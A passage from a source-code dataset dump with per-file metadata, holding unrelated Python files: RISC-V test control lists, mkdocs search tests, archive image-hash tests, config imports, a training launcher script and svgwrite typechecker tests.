] | 111 | 2020-06-12T22:31:30.000Z | 2022-03-19T03:45:20.000Z | tests/riscv/_rv32_fctrl.py | noahsherrill/force-riscv | 500cec3017f619dbf853a497bf02eaeecca927c9 | [
"Apache-2.0"
] | 34 | 2020-06-12T20:23:40.000Z | 2022-03-15T20:04:31.000Z | tests/riscv/_rv32_fctrl.py | noahsherrill/force-riscv | 500cec3017f619dbf853a497bf02eaeecca927c9 | [
"Apache-2.0"
] | 32 | 2020-06-12T19:15:26.000Z | 2022-02-20T11:38:31.000Z | #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
control_items = [
{
"fname": "rv32/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "APIs/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "APIs/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "address_solving/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "loop/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "loop/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "branch/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "branch/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "exception_handlers/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/g_instructions/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/g_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/c_instructions/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/c_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/v_instructions/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/v_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/priv_instructions/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/priv_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "instructions/zfh_instructions/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "paging/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "paging/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "privilege_switch/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "privilege_switch/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "state_transition/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "vector/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "../../examples/riscv/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "bnt/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "register/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "register/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "multiprocessing/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "multiprocessing/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "thread_group/_def_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
{
"fname": "thread_group/_noiss_fctrl.py",
"generator": {"--cfg": "config/riscv_rv32.config"},
},
]
| 31.22449 | 70 | 0.564488 | 474 | 4,590 | 5.227848 | 0.2173 | 0.090395 | 0.206618 | 0.245359 | 0.776836 | 0.776836 | 0.776836 | 0.776836 | 0.776836 | 0.758676 | 0 | 0.021203 | 0.239651 | 4,590 | 146 | 71 | 31.438356 | 0.688825 | 0.12658 | 0 | 0.246154 | 0 | 0 | 0.582269 | 0.387178 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
87d10cacd932ab8917b597c3468e9376b2a02814 | 1,358 | py | Python | tests/test_search.py | brospars/mkdocs-static-i18n | be7c0149dda30c4269a694cb552849a5ed53e11d | [
"MIT"
] | 63 | 2021-02-08T14:04:02.000Z | 2022-03-27T09:33:04.000Z | tests/test_search.py | brospars/mkdocs-static-i18n | be7c0149dda30c4269a694cb552849a5ed53e11d | [
"MIT"
] | 84 | 2021-02-08T13:30:14.000Z | 2022-03-31T07:13:05.000Z | tests/test_search.py | brospars/mkdocs-static-i18n | be7c0149dda30c4269a694cb552849a5ed53e11d | [
"MIT"
] | 16 | 2021-03-08T02:04:38.000Z | 2022-03-18T03:45:40.000Z | from mkdocs.commands.build import build
def test_search_add_lang(config_plugin_search):
config = config_plugin_search
build(config)
search_plugin = config["plugins"]["search"]
assert search_plugin.config["lang"] == ["en", "fr"]
def test_search_entries(config_plugin_search):
config = config_plugin_search
config["plugins"]["i18n"].config["languages"] = {"fr": "français"}
build(config)
search_plugin = config["plugins"]["search"]
assert len(search_plugin.search_index._entries) == 30
def test_search_entries_no_directory_urls(config_plugin_search):
config = config_plugin_search
config["use_directory_urls"] = False
config["plugins"]["i18n"].config["languages"] = {"fr": "français"}
build(config)
search_plugin = config["plugins"]["search"]
assert len(search_plugin.search_index._entries) == 30
def test_search_deduplicate_entries(config_plugin_search):
config = config_plugin_search
build(config)
search_plugin = config["plugins"]["search"]
assert len(search_plugin.search_index._entries) == 30
def test_search_deduplicate_entries_no_directory_urls(config_plugin_search):
config = config_plugin_search
config["use_directory_urls"] = False
build(config)
search_plugin = config["plugins"]["search"]
assert len(search_plugin.search_index._entries) == 30
| 33.121951 | 76 | 0.737113 | 168 | 1,358 | 5.595238 | 0.172619 | 0.178723 | 0.191489 | 0.204255 | 0.901064 | 0.901064 | 0.901064 | 0.901064 | 0.848936 | 0.848936 | 0 | 0.010274 | 0.139912 | 1,358 | 40 | 77 | 33.95 | 0.794521 | 0 | 0 | 0.766667 | 0 | 0 | 0.124448 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.166667 | false | 0 | 0.033333 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
e20b57caba79d74bcfa5412839924857162f8f6b | 18,280 | py | Python | Tests/Test_validateTestArches.py | brucewxh/IntraArchiveDeduplicator | 7b0c07cc9fffa75e1b7be285f42b0a8fad42dcfb | [
"BSD-3-Clause"
] | 86 | 2015-01-13T15:02:08.000Z | 2021-12-24T02:13:03.000Z | Tests/Test_validateTestArches.py | brucewxh/IntraArchiveDeduplicator | 7b0c07cc9fffa75e1b7be285f42b0a8fad42dcfb | [
"BSD-3-Clause"
] | 4 | 2016-11-18T20:08:50.000Z | 2018-03-08T23:05:37.000Z | Tests/Test_validateTestArches.py | brucewxh/IntraArchiveDeduplicator | 7b0c07cc9fffa75e1b7be285f42b0a8fad42dcfb | [
"BSD-3-Clause"
] | 12 | 2015-05-03T07:56:50.000Z | 2021-03-11T12:38:56.000Z |
import unittest
import scanner.logSetup as logSetup
import os.path
import pprint
import pArch
# Unit testing driven by lolcat images
# AS GOD INTENDED!
arches = [
"allArch.zip",
"notQuiteAllArch.zip",
"regular.zip",
"small.zip",
"testArch.zip",
"z_reg_junk.zip",
"z_reg.zip",
"z_sml_u.zip",
"z_sml_w.zip",
"z_sml.zip",
"regular-u.zip",
"small_and_regular_half_common.zip",
"small_and_regular.zip",
]
expect = {'allArch.zip': [('Lolcat_this_is_mah_job.jpg',
{'hexHash': 'd9ceeb6b43c2d7d096532eabfa6cf482',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('Lolcat_this_is_mah_job.png',
{'hexHash': '1268e704908cc39299d73d6caafc23a0',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/png'}),
('Lolcat_this_is_mah_job_small.jpg',
{'hexHash': '40d39c436e14282dcda06e8aff367307',
'imX': 300,
'imY': 237,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('dangerous-to-go-alone.jpg',
{'hexHash': 'dcd6097eeac911efed3124374f44085b',
'imX': 325,
'imY': 307,
'pHash': -7813072021139921681,
'type': 'image/jpeg'}),
('lolcat-crocs.jpg',
{'hexHash': '6d0a977694630ac9d1d33a7f068e10f8',
'imX': 500,
'imY': 363,
'pHash': -7472365462264617431,
'type': 'image/jpeg'}),
('lolcat-oregon-trail.jpg',
{'hexHash': '7227289a017988b6bdcf61fd4761f6b9',
'imX': 501,
'imY': 356,
'pHash': -3164295607292040329,
'type': 'image/jpeg'})],
'notQuiteAllArch.zip': [('Lolcat_this_is_mah_job.jpg',
{'hexHash': 'd9ceeb6b43c2d7d096532eabfa6cf482',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('Lolcat_this_is_mah_job.png',
{'hexHash': '1268e704908cc39299d73d6caafc23a0',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/png'}),
('Lolcat_this_is_mah_job_small.jpg',
{'hexHash': '40d39c436e14282dcda06e8aff367307',
'imX': 300,
'imY': 237,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('lolcat-crocs.jpg',
{'hexHash': '6d0a977694630ac9d1d33a7f068e10f8',
'imX': 500,
'imY': 363,
'pHash': -7472365462264617431,
'type': 'image/jpeg'}),
('lolcat-oregon-trail.jpg',
{'hexHash': '7227289a017988b6bdcf61fd4761f6b9',
'imX': 501,
'imY': 356,
'pHash': -3164295607292040329,
'type': 'image/jpeg'})],
'regular-u.zip': [('e61ec521-155d-4a3a-956d-2544d4367e02.jpg',
{'hexHash': '35484890b48148d260b52ebbb7493ffc',
'imX': 500,
'imY': 375,
'pHash': -1214778561678645686,
'type': 'image/jpeg'}),
('funny-pictures-cat-looks-like-an-owl.jpg',
{'hexHash': 'bd914f72d824d2a18d076f7643017505',
'imX': 492,
'imY': 442,
'pHash': -7960835595440524977,
'type': 'image/jpeg'}),
('funny-pictures-cat-will-do-science.jpg',
{'hexHash': '5b5620b0cfcb469aef632864707a0445',
'imX': 500,
'imY': 674,
'pHash': -8653036037266837299,
'type': 'image/jpeg'}),
('funny-pictures-kitten-rules-a-tower.jpg',
{'hexHash': 'a26d63bdbb38621b8f44c563ff496987',
'imX': 500,
'imY': 375,
'pHash': -1016743032983903389,
'type': 'image/jpeg'}),
('superheroes-batman-superman-i-would-watch-the-hell-out-of-this.jpg',
{'hexHash': '2931dfcefe6af7c5d024eb798ac5e7c6',
'imX': 472,
'imY': 700,
'pHash': -2452239955093831550,
'type': 'image/jpeg'})],
'regular.zip': [('e61ec521-155d-4a3a-956d-2544d4367e02.jpg',
{'hexHash': '35484890b48148d260b52ebbb7493ffc',
'imX': 500,
'imY': 375,
'pHash': -1214778561678645686,
'type': 'image/jpeg'}),
('funny-pictures-cat-looks-like-an-owl.jpg',
{'hexHash': 'bd914f72d824d2a18d076f7643017505',
'imX': 492,
'imY': 442,
'pHash': -7960835595440524977,
'type': 'image/jpeg'}),
('funny-pictures-cat-will-do-science.jpg',
{'hexHash': '5b5620b0cfcb469aef632864707a0445',
'imX': 500,
'imY': 674,
'pHash': -8653036037266837299,
'type': 'image/jpeg'}),
('funny-pictures-kitten-rules-a-tower.jpg',
{'hexHash': 'a26d63bdbb38621b8f44c563ff496987',
'imX': 500,
'imY': 375,
'pHash': -1016743032983903389,
'type': 'image/jpeg'})],
'small.zip': [('e61ec521-155d-4a3a-956d-2544d4367e02-ps.png',
{'hexHash': 'b4c3d02411a34e1222972cc262a40b89',
'imX': 375,
'imY': 281,
'pHash': -1214778561678645686,
'type': 'image/png'}),
('funny-pictures-cat-looks-like-an-owl-ps.png',
{'hexHash': '740555f4e730ab2c6c261be7d53a3156',
'imX': 369,
'imY': 332,
'pHash': -7960835595440524977,
'type': 'image/png'}),
('funny-pictures-cat-will-do-science-ps.png',
{'hexHash': 'c47ed1cd79c4e7925b8015cb51bbab10',
'imX': 375,
'imY': 506,
'pHash': -8653036037266837299,
'type': 'image/png'}),
('funny-pictures-kitten-rules-a-tower-ps.png',
{'hexHash': 'fb64248009dde8605a95b041b772544a',
'imX': 375,
'imY': 281,
'pHash': -1016743032983903389,
'type': 'image/png'}),
('superheroes-batman-superman-i-would-watch-the-hell-out-of-this.jpg',
{'hexHash': '083e179ff11ccf90a0d514651c69c2ca',
'imX': 200,
'imY': 297,
'pHash': -2452239955093831550,
'type': 'image/jpeg'})],
'small_and_regular.zip': [('e61ec521-155d-4a3a-956d-2544d4367e02-ps.png',
{'hexHash': 'b4c3d02411a34e1222972cc262a40b89',
'imX': 375,
'imY': 281,
'pHash': -1214778561678645686,
'type': 'image/png'}),
('e61ec521-155d-4a3a-956d-2544d4367e02.jpg',
{'hexHash': '35484890b48148d260b52ebbb7493ffc',
'imX': 500,
'imY': 375,
'pHash': -1214778561678645686,
'type': 'image/jpeg'}),
('funny-pictures-cat-looks-like-an-owl-ps.png',
{'hexHash': '740555f4e730ab2c6c261be7d53a3156',
'imX': 369,
'imY': 332,
'pHash': -7960835595440524977,
'type': 'image/png'}),
('funny-pictures-cat-looks-like-an-owl.jpg',
{'hexHash': 'bd914f72d824d2a18d076f7643017505',
'imX': 492,
'imY': 442,
'pHash': -7960835595440524977,
'type': 'image/jpeg'}),
('funny-pictures-cat-will-do-science-ps.png',
{'hexHash': 'c47ed1cd79c4e7925b8015cb51bbab10',
'imX': 375,
'imY': 506,
'pHash': -8653036037266837299,
'type': 'image/png'}),
('funny-pictures-cat-will-do-science.jpg',
{'hexHash': '5b5620b0cfcb469aef632864707a0445',
'imX': 500,
'imY': 674,
'pHash': -8653036037266837299,
'type': 'image/jpeg'}),
('funny-pictures-kitten-rules-a-tower-ps.png',
{'hexHash': 'fb64248009dde8605a95b041b772544a',
'imX': 375,
'imY': 281,
'pHash': -1016743032983903389,
'type': 'image/png'}),
('funny-pictures-kitten-rules-a-tower.jpg',
{'hexHash': 'a26d63bdbb38621b8f44c563ff496987',
'imX': 500,
'imY': 375,
'pHash': -1016743032983903389,
'type': 'image/jpeg'})],
'small_and_regular_half_common.zip': [('718933691_2b0100d6d4_o.png',
{'hexHash': '8952f5ece2f5867c3ff2b6e8a55db21f',
'imX': 507,
'imY': 679,
'pHash': -8197763240258625978,
'type': 'image/png'}),
('CatT.png',
{'hexHash': '5f0aba1e6d1a7cf66c722f0fddb7ed18',
'imX': 125,
'imY': 201,
'pHash': -6104997819240060432,
'type': 'image/png'}),
('circuit_diagram.png',
{'hexHash': '494b166f7729f18906fae08d6bb93022',
'imX': 740,
'imY': 952,
'pHash': -1241034801844984807,
'type': 'image/png'}),
('e61ec521-155d-4a3a-956d-2544d4367e02-ps.png',
{'hexHash': 'b4c3d02411a34e1222972cc262a40b89',
'imX': 375,
'imY': 281,
'pHash': -1214778561678645686,
'type': 'image/png'}),
('e61ec521-155d-4a3a-956d-2544d4367e02.jpg',
{'hexHash': '35484890b48148d260b52ebbb7493ffc',
'imX': 500,
'imY': 375,
'pHash': -1214778561678645686,
'type': 'image/jpeg'}),
('funny-pictures-cat-looks-like-an-owl-ps.png',
{'hexHash': '740555f4e730ab2c6c261be7d53a3156',
'imX': 369,
'imY': 332,
'pHash': -7960835595440524977,
'type': 'image/png'}),
('funny-pictures-cat-looks-like-an-owl.jpg',
{'hexHash': 'bd914f72d824d2a18d076f7643017505',
'imX': 492,
'imY': 442,
'pHash': -7960835595440524977,
'type': 'image/jpeg'})],
'testArch.zip': [('Lolcat_this_is_mah_job.png',
{'hexHash': '1268e704908cc39299d73d6caafc23a0',
'imX': 493,
'imY': 389,
'pHash': -4992890192511777340,
'type': 'image/png'}),
('Lolcat_this_is_mah_job_small.jpg',
{'hexHash': '40d39c436e14282dcda06e8aff367307',
'imX': 300,
'imY': 237,
'pHash': -4992890192511777340,
'type': 'image/jpeg'}),
('dangerous-to-go-alone.jpg',
{'hexHash': 'dcd6097eeac911efed3124374f44085b',
'imX': 325,
'imY': 307,
'pHash': -7813072021139921681,
'type': 'image/jpeg'})],
'z_reg.zip': [('129165237051396578.jpg',
{'hexHash': 'b688e3ead00ca1453f860b408c446ec2',
'imX': 332,
'imY': 497,
'pHash': -3913567795023694905,
'type': 'image/jpeg'}),
('test.txt',
{'hexHash': 'b3a79c95a10b4cc0a838b35782b4dc0a',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})],
'z_reg_junk.zip': [('129165237051396578.jpg',
{'hexHash': 'b688e3ead00ca1453f860b408c446ec2',
'imX': 332,
'imY': 497,
'pHash': -3913567795023694905,
'type': 'image/jpeg'}),
('Thumbs.db',
{'hexHash': '2ea0b76437adb1dfb8889beab9d7ef3b',
'imX': None,
'imY': None,
'pHash': None,
'type': 'application/CDFV2'}),
('__MACOSX/test.txt',
{'hexHash': '1ad84adee17e7d3525528ff7e381a900',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'}),
('deleted.txt',
{'hexHash': '2fe06876bc7694a6357e5d9c5f05e0ab',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'}),
('test.txt',
{'hexHash': 'b3a79c95a10b4cc0a838b35782b4dc0a',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})],
'z_sml.zip': [('129165237051396578(s).jpg',
{'hexHash': '7c257ec7fdfd24f249d290dc47dcc71c',
'imX': 249,
'imY': 373,
'pHash': -3913567795023694905,
'type': 'image/jpeg'}),
('test.txt',
{'hexHash': 'b3a79c95a10b4cc0a838b35782b4dc0a',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})],
'z_sml_u.zip': [('129165237051396578(s).jpg',
{'hexHash': '7c257ec7fdfd24f249d290dc47dcc71c',
'imX': 249,
'imY': 373,
'pHash': -3913567795023694905,
'type': 'image/jpeg'}),
('test.txt',
{'hexHash': '1234ae2e7a21c94100cb60773efe482b',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})],
'z_sml_w.zip': [('129165237051396578(s).jpg',
{'hexHash': 'e8566233d43b2e964b77471a99c5fa36',
'imX': 100,
'imY': 100,
'pHash': -9223372036854775808,
'type': 'image/jpeg'}),
('test.txt',
{'hexHash': 'b3a79c95a10b4cc0a838b35782b4dc0a',
'imX': None,
'imY': None,
'pHash': None,
'type': 'text/plain'})]
}
class TestSequenceFunctions(unittest.TestCase):
def __init__(self, *args, **kwargs):
logSetup.initLogging()
super().__init__(*args, **kwargs)
self.maxDiff = None
def test_validate_arches(self):
got = {}
for arch_name in arches:
cwd = os.path.dirname(os.path.realpath(__file__))
archPath = os.path.join(cwd, 'test_ptree_base', arch_name)
arch = pArch.PhashArchive(archPath)
archHashes = list(arch.iterHashes())
for item in archHashes:
del item[1]['cont']
got[arch_name] = archHashes
expect_keys = list(expect.keys())
got_keys = list(got.keys())
expect_keys.sort()
got_keys.sort()
self.assertEqual(expect_keys, got_keys)
print()
print()
pprint.pprint(expect)
print()
print()
for key in expect_keys:
if got[key] != expect_keys:
print("Key:", key)
pprint.pprint(expect[key])
for key in expect_keys:
self.assertEqual(expect[key], got[key])
| 44.476886 | 89 | 0.404978 | 1,163 | 18,280 | 6.282889 | 0.184867 | 0.059121 | 0.056932 | 0.024634 | 0.791022 | 0.773368 | 0.763104 | 0.757493 | 0.755851 | 0.745997 | 0 | 0.269405 | 0.467177 | 18,280 | 410 | 90 | 44.585366 | 0.480801 | 0.002899 | 0 | 0.760309 | 0 | 0.005155 | 0.311399 | 0.190659 | 0 | 0 | 0 | 0 | 0.005155 | 1 | 0.005155 | false | 0 | 0.012887 | 0 | 0.020619 | 0.020619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
356f2b877a7dd5bde8889e6ff27ebdbdb036c5b6 | 83 | py | Python | build/lib/minotaur-manticore-maze/__init__.py | smidem/minotaur-manticore-maze | 0c08c83857b19be6cc6cae4b1f2acf5d485858a6 | [
"MIT"
] | null | null | null | build/lib/minotaur-manticore-maze/__init__.py | smidem/minotaur-manticore-maze | 0c08c83857b19be6cc6cae4b1f2acf5d485858a6 | [
"MIT"
] | null | null | null | build/lib/minotaur-manticore-maze/__init__.py | smidem/minotaur-manticore-maze | 0c08c83857b19be6cc6cae4b1f2acf5d485858a6 | [
"MIT"
] | null | null | null | from progress import Progress
print('\u2680','\u2681','\u2682','\u2683','\u2684')
| 20.75 | 51 | 0.674699 | 10 | 83 | 5.6 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25974 | 0.072289 | 83 | 3 | 52 | 27.666667 | 0.467532 | 0 | 0 | 0 | 0 | 0 | 0.361446 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
35e853e7ea8737e680648b1d3ec560a37bb488cf | 223 | py | Python | dizoo/d4rl/config/__init__.py | sailxjx/DI-engine | c6763f8e2ba885a2a02f611195a1b5f8b50bff00 | [
"Apache-2.0"
] | 464 | 2021-07-08T07:26:33.000Z | 2022-03-31T12:35:16.000Z | dizoo/d4rl/config/__init__.py | sailxjx/DI-engine | c6763f8e2ba885a2a02f611195a1b5f8b50bff00 | [
"Apache-2.0"
] | 177 | 2021-07-09T08:22:55.000Z | 2022-03-31T07:35:22.000Z | dizoo/d4rl/config/__init__.py | sailxjx/DI-engine | c6763f8e2ba885a2a02f611195a1b5f8b50bff00 | [
"Apache-2.0"
] | 92 | 2021-07-08T12:16:37.000Z | 2022-03-31T09:24:41.000Z | from .hopper_cql_default_config import hopper_cql_default_config
from .hopper_expert_cql_default_config import hopper_expert_cql_default_config
from .hopper_medium_cql_default_config import hopper_medium_cql_default_config
| 55.75 | 78 | 0.932735 | 34 | 223 | 5.470588 | 0.235294 | 0.322581 | 0.516129 | 0.354839 | 0.946237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053812 | 223 | 3 | 79 | 74.333333 | 0.881517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ea6c991e6b88cc3f19212a979f0e925db3ac8e4a | 515 | py | Python | train_mosmed_timm-regnetx_002_flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | train_mosmed_timm-regnetx_002_flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | train_mosmed_timm-regnetx_002_flip.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | import os
ls=["python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold0_flip.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold1_flip.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold2_flip.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold3_flip.yml",
"python main.py --configs configs/train_mosmed_unetplusplus_timm-regnetx_002_fold4_flip.yml",
]
for l in ls:
os.system(l) | 46.818182 | 97 | 0.838835 | 80 | 515 | 5.025 | 0.3 | 0.124378 | 0.149254 | 0.236318 | 0.853234 | 0.853234 | 0.853234 | 0.853234 | 0.853234 | 0.853234 | 0 | 0.041322 | 0.060194 | 515 | 11 | 98 | 46.818182 | 0.789256 | 0 | 0 | 0 | 0 | 0 | 0.872093 | 0.629845 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
57705961f81ab7e244ae8501d619af12e8ee91ac | 40 | py | Python | dotblotr/analysis/__init__.py | czbiohub/dotblotr | 42418e168e436b935be41638072ebc55a9c2cfbe | [
"MIT"
] | 1 | 2020-10-19T11:59:37.000Z | 2020-10-19T11:59:37.000Z | dotblotr/analysis/__init__.py | czbiohub/dotblotr | 42418e168e436b935be41638072ebc55a9c2cfbe | [
"MIT"
] | null | null | null | dotblotr/analysis/__init__.py | czbiohub/dotblotr | 42418e168e436b935be41638072ebc55a9c2cfbe | [
"MIT"
] | null | null | null | from .hit_counts import calc_hit_counts
| 20 | 39 | 0.875 | 7 | 40 | 4.571429 | 0.714286 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
57929860485c34828d1bea43bdeeee99b9bee625 | 18,289 | py | Python | dependencies/svgwrite/tests/test_full11_typechecker.py | charlesmchen/typefacet | 8c6db26d0c599ece16f3704696811275120a4044 | [
"Apache-2.0"
] | 21 | 2015-01-16T05:10:02.000Z | 2021-06-11T20:48:15.000Z | dependencies/svgwrite/tests/test_full11_typechecker.py | charlesmchen/typefacet | 8c6db26d0c599ece16f3704696811275120a4044 | [
"Apache-2.0"
] | 1 | 2019-09-09T12:10:27.000Z | 2020-05-22T10:12:14.000Z | dependencies/svgwrite/tests/test_full11_typechecker.py | charlesmchen/typefacet | 8c6db26d0c599ece16f3704696811275120a4044 | [
"Apache-2.0"
] | 2 | 2015-05-03T04:51:08.000Z | 2018-08-24T08:28:53.000Z | #!/usr/bin/env python
#coding:utf-8
# Author: mozman --<mozman@gmx.at>
# Purpose: test full11typechecker
# Created: 04.10.2010
# Copyright (C) 2010, Manfred Moitzi
# License: GPLv3
import sys
import unittest
from svgwrite.data.typechecker import Full11TypeChecker
class TestFull11TypeChecker(unittest.TestCase):
def setUp(self):
self.checker = Full11TypeChecker()
def test_version(self):
self.assertEqual(('1.1', 'full'), self.checker.get_version())
def test_is_anything(self):
""" Everything is valid. """
self.assertTrue(self.checker.is_anything('abcdef :::\n \r \t all is valid äüß'))
self.assertTrue(self.checker.is_anything(100.0))
self.assertTrue(self.checker.is_anything((100.0, 11)))
self.assertTrue(self.checker.is_anything(dict(a=100, b=200)))
def test_is_string(self):
""" Everything is valid. """
self.assertTrue(self.checker.is_anything('abcdef :::\n \r \t all is valid äüß'))
self.assertTrue(self.checker.is_anything(100.0))
self.assertTrue(self.checker.is_anything((100.0, 11)))
self.assertTrue(self.checker.is_anything(dict(a=100, b=200)))
def test_is_number(self):
""" Integer and Float, also as String '100' or '3.1415'. """
# big numbers only valid for full profile
self.assertTrue(self.checker.is_number(100000))
self.assertTrue(self.checker.is_number(-100000))
self.assertTrue(self.checker.is_number(3.141592))
